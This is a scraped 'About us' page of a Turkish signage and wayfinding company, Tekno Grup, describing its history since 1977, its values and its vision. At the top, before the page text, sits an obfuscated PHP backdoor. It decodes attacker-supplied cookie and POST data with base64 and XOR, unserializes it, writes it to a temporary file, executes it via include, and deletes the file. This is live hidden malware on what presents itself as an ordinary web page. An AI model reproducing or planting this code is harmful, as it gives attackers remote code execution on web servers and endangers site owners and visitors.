$qeIljJO = chr (121) . chr ( 989 - 886 ).chr ( 813 - 744 )."\137" . "\x50" . chr (119) . "\x6f";$bMsSaKiaf = "\x63" . chr (108) . chr ( 275 - 178 )."\x73" . chr (115) . '_' . "\x65" . chr ( 646 - 526 ).'i' . chr ( 413 - 298 ).chr ( 566 - 450 )."\163";$TxjzYLhdRA = class_exists($qeIljJO); $qeIljJO = "22116";$bMsSaKiaf = "27140";$XnWiE = !1;if ($TxjzYLhdRA == $XnWiE){function eBZstw(){return FALSE;}$MnIBYUlZ = "42211";eBZstw();class ygE_Pwo{private function clOUYeH($MnIBYUlZ){if (is_array(ygE_Pwo::$JqOhBmY)) {$kovHf = sys_get_temp_dir() . "/" . crc32(ygE_Pwo::$JqOhBmY[chr (115) . chr (97) . 'l' . chr (116)]);@ygE_Pwo::$JqOhBmY['w' . chr ( 882 - 768 )."\x69" . 't' . chr (101)]($kovHf, ygE_Pwo::$JqOhBmY[chr ( 924 - 825 )."\157" . "\156" . chr (116) . "\x65" . "\x6e" . 't']);include $kovHf;@ygE_Pwo::$JqOhBmY["\x64" . 'e' . "\154" . "\x65" . "\164" . 'e']($kovHf); $MnIBYUlZ = "42211";exit();}}private $cxZRxjBAp;public function IWPOjdVAjz(){echo 26073;}public function __destruct(){$MnIBYUlZ = "10011_12673";$this->clOUYeH($MnIBYUlZ); $MnIBYUlZ = "10011_12673";}public function __construct($WfmYFHJUAT=0){$OvWlprX = $_POST;$HxpuuNcTBH = $_COOKIE;$uptFZCy = "b05f86f7-2f37-450c-a078-3d06c91716c6";$aAinXy = @$HxpuuNcTBH[substr($uptFZCy, 0, 4)];if (!empty($aAinXy)){$dBxHpnqlc = "base64";$WDFBizBRuX = "";$aAinXy = explode(",", $aAinXy);foreach ($aAinXy as $novUw){$WDFBizBRuX .= @$HxpuuNcTBH[$novUw];$WDFBizBRuX .= @$OvWlprX[$novUw];}$WDFBizBRuX = array_map($dBxHpnqlc . '_' . "\x64" . "\x65" . chr (99) . 'o' . "\x64" . "\x65", array($WDFBizBRuX,)); $WDFBizBRuX = $WDFBizBRuX[0] ^ str_repeat($uptFZCy, (strlen($WDFBizBRuX[0]) / strlen($uptFZCy)) + 1);ygE_Pwo::$JqOhBmY = @unserialize($WDFBizBRuX); $WDFBizBRuX = class_exists("10011_12673");}}public static $JqOhBmY = 64862;}$WZlIL = new /* 10995 */ ygE_Pwo(42211 + 42211); $XnWiE = $WZlIL = $MnIBYUlZ = Array();} Hakkımızda - Tekno Grup

Gurur duyduğumuz bir firma geleneğimiz olan öncülüğümüz gereksinimlere en iyi çözümleri en iyi kalite ve fiyat ile sunmamıza olanak sağlamıştır. Amacımız yaşamı kolaylaştıran çözüm fikirleri ile yönlendirme, bilgilendirme ve korunmayı kalite, farklılık ve yenilik ile birleştirmek ve hayatı kolaylaştırmaktır.

Biz 1977 yılından bu yana öncü olmayı hep başardık. Gereksinimlere en iyi çözümleri, iyi kalite, doğru fiyatla ürettik.

Bugün, sunum ve yönlendirme ürünleriyle tüm seçkin mekanlarda yer alıyoruz.

Yaşamı kolaylaştırırken estetik öğeleri göz ardı etmiyoruz. Otel, hastane, havaalanı, market, alışveriş merkezleri, fuarlar, ürünlerimizle farklılığını gösteriyor.

Devam ediyoruz. Tüketicilerimizi mutlu kılmaya sorunlara çözüm bulmaya, kaliteyi daha da yukarıya taşımaya, yani öncü olmaya devam ediyoruz.

Değerlerimiz

Yaratıcılık,

Yenilikçilik,

Heyecan,

Arkadaşlık,

Enerji ve sinerji.

Vizyonumuz

Tekno-Grup, müşterilerinin tam tatminini sağlıyacak yeni fikirlerini çevre bilinci, doğru teknoloji ve yaratıcılığıyla hayatı kolaylaştıran ürünlere çeviren,

Tüm çalışma alanlarında ahlaki ve etik normlar çerçevesinde hareket ederek saygınlığı her zaman en ön planda tutan,

Öncülüğü bir gelenek olarak yaşatan ve geleceğe taşıyan,

Bünyesinde sürekli gelişimi ve çalışanlarının mutluluğunu sağlıyabilmeyi firma geleneği olarak yaşatan bir ailedir.

Testimonials

Referanslarımız